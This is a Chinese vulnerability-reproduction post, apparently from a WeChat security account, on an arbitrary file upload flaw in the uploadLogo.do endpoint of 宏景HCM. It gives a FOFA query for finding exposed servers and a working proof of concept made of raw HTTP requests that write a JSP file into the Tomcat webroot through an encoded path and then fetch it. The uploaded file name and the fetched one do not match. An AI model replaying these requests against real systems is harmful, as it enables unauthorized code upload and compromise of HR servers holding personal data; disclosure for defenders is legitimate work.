1. 宏景HCM 口简介
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发
宏景HCM
2.漏洞描述
宏景HCM uploadLogo.do接口存在任意文件上传漏洞
CVE编号:
CNNVD编号:
CNVD编号:
3.影响版本
宏景HCM
4.fofa查询语句
body='<div class="hj-hy-all-one-logo"'
5.漏洞复现
漏洞数据包:
第一步,获取cookie
GET /module/system/qrcard/mobilewrite/qrcardmain.jsp HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
第二部,获取路径
POST /sys/cms/uploadLogo.do?b_upload=upload&isClose=2&type=1 HTTP/1.1
Host: xx.xx.xx.xx
User-Agent:Mozilla/4.0(compatible; MSIE 8.0;Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept:*/*
Connection: close
Cookie: JSESSIONID=7EF0DA3260081E4BE81B06CA145761FB
Content-Length: 587
Content-Type: multipart/form-data; boundary=09040231427371112abff3a2a34c3efe
--09040231427371112abff3a2a34c3efe
Content-Disposition: form-data; name="path"
--09040231427371112abff3a2a34c3efe
Content-Disposition: form-data; name="lfType"
0
--09040231427371112abff3a2a34c3efe
Content-Disposition: form-data; name="logofile"; filename=""
Content-Type: image/gif
<%= "bttest1" %>
--09040231427371112abff3a2a34c3efe
Content-Disposition: form-data; name="twoFile"; filename=""
Content-Type: image/gif
<%= "bttest1" %>
--09040231427371112abff3a2a34c3efe
Content-Disposition: form-data; name="param"
param
--09040231427371112abff3a2a34c3efe--
第三步,上传文件
POST /sys/cms/uploadLogo.do?b_upload=upload&isClose=2&type=1 HTTP/1.1
Host: xx.xx.xx.xx
User-Agent:Mozilla/5.0(Windows NT 10.0;Win64; x64; rv:108.0)Gecko/20100101Firefox/108.0
Cookie: JSESSIONID=163CC9FFC3CAAEAFCF07F29B294E99F0
Content-Type:multipart/form-data; boundary=----WebKitFormBoundaryfjKBvGWJbG07Z02r
------WebKitFormBoundaryfjKBvGWJbG07Z02r
Content-Disposition: form-data; name="path"
D~3a~5cTomcat~39~5cwebapps~5cROOT~5ctest1.jsp
------WebKitFormBoundaryfjKBvGWJbG07Z02r
Content-Disposition: form-data; name="lfType"
0
------WebKitFormBoundaryfjKBvGWJbG07Z02r
Content-Disposition: form-data; name="logofile"; filename=""
Content-Type: image/gif
<%="bttest1"%>
------WebKitFormBoundaryfjKBvGWJbG07Z02r
Content-Disposition: form-data; name="twoFile"; filename=""
Content-Type: image/gif
<%="bttest1"%>
------WebKitFormBoundaryfjKBvGWJbG07Z02r--
访问上传文件路径
GET /test123.jsp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: xx.xx.xx.xx
Cookie: JSESSIONID=7EF0DA3260081E4BE81B06CA145761FB;
原文始发于微信公众号(南风漏洞复现文库):宏景HCM uploadLogo.do接口存在任意文件上传漏洞 附POC
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论